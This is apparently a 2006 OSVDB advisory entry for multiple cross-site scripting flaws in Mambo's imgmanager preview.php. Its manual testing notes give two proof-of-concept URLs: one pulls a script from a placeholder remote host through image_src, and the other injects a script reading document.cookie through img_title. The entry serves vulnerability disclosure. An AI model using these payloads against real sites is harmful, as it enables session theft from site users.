Mambo imgmanager/ImageManager/preview.php Multiple Variable XSS

2006-05-23T03:20:14
ID OSVDB:26174
Type osvdb
Reporter rgod(rgod@autistici.org)
Modified 2006-05-23T03:20:14

Description

Manual Testing Notes

http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_mce/plugins/imgmanager/ImageManager/preview.php?image_src=http://location/evilscript.js http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_mce/plugins/imgmanager/ImageManager/preview.php?img_title=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

References:

Related OSVDB ID: 26173 Related OSVDB ID: 26172 Related OSVDB ID: 26171 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-05/0491.html